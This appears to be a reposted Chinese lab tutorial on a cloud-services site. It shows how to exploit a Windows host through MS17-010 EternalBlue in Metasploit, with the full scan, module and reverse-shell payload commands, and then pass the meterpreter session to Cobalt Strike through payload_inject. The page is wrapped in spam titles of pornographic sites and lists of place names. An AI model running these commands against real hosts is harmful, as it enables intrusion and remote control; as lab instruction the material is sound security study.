91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行MSF和CobaltStrike聯動

發布時間:2021-12-24 11:24:46 來源:億速云 閱讀:251 作者:柒染 欄目:網絡管理

本篇文章為大家展示了如何進行MSF和CobaltStrike聯動,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

0x00環境介紹

攻擊機:192.168.60.129 (kali)

受害機:192.168.60.131

網關:192.168.60.2

工具:nmap、metaspolit、cobaltstrike

0x01攻擊準備

首先部署受害主機調制網卡可以互相通信。如何進行MSF和CobaltStrike聯動

接下來部署web應用服務,搞的看起來像是真實的應用服務器一樣哈如何進行MSF和CobaltStrike聯動

0x02前攻擊階段

通過使用nmap信息收集發現開放端口445、3389及操作系統版本信息。

nmap -A 192.168.60.131   如何進行MSF和CobaltStrike聯動

通過信息收集發現系統開放445端口,使用工具檢測是否存在ms17_010漏洞,發現存在。如何進行MSF和CobaltStrike聯動

接近著神器1 Metaspolit上場

首先打開msf,進行漏洞利用

1.搜索利用漏洞模塊

search ms17_010     如何進行MSF和CobaltStrike聯動

2.漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129

獲得session

進入meterpreter會話。如何進行MSF和CobaltStrike聯動

接近著神器2Cobaltstrike上場

如果覺得功能太少,也可以和Cobaltstrike聯動

啟動Cobaltstrike 如何進行MSF和CobaltStrike聯動

現在獲得是一個MSF的meterpreter類型的session,且session id為1

在Cobaltstrike新建一個監聽,配置如下: 如何進行MSF和CobaltStrike聯動

在MSF中設置如下

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1

如何進行MSF和CobaltStrike聯動

exploit

如何進行MSF和CobaltStrike聯動

這樣就可以看到在Cobaltstrike中獲取到了了MSF彈回的Meterpreter會話。

如何進行MSF和CobaltStrike聯動

最后可以使用Cobaltstrike中集成的滲透模塊進行進一步的測試。

注:只有Meterpreter類型的session才能派生給Cobaltstrike。

上述內容就是如何進行MSF和CobaltStrike聯動,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

宝鸡市| 隆回县| 邳州市| 静海县| 宁城县| 桂平市| 南漳县| 潜山县| 丹阳市| 伊吾县| 孝感市| 灵宝市| 葵青区| 含山县| 昆明市| 江源县| 阜阳市| 横峰县| 惠水县| 呈贡县| 收藏| 杨浦区| 阳西县| 托克逊县| 北辰区| 多伦县| 新疆| 乾安县| 阿荣旗| 崇礼县| 罗平县| 陆河县| 黄骅市| 深圳市| 淮安市| 门头沟区| 康定县| 呼伦贝尔市| 舞阳县| 任丘市| 宜春市|